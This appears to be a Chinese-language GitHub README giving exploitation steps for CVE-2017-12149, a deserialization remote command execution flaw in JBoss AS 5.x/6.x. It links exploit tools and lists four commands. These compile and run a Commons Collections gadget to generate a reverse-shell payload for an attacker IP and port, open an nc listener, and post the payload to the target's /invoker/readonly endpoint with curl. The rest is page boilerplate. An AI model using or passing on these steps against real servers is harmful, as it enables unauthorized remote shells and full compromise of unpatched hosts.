JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

Githubhttps://github.com/joaomatosf/JavaDeserH2HC
https://access.redhat.com/security/cve/cve-2017-12149
工具GUIhttp://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

漏洞利用

1: javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2: java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口,然后会生成一个ReverseShellCommonsCollectionsHashMap.ser文件

3: 打开另外一个终端并且nc开始设置的反弹shell的IP

4: curl 网址/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

漏洞利用

Files

README.md

Latest commit

History

README.md

File metadata and controls

JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

漏洞利用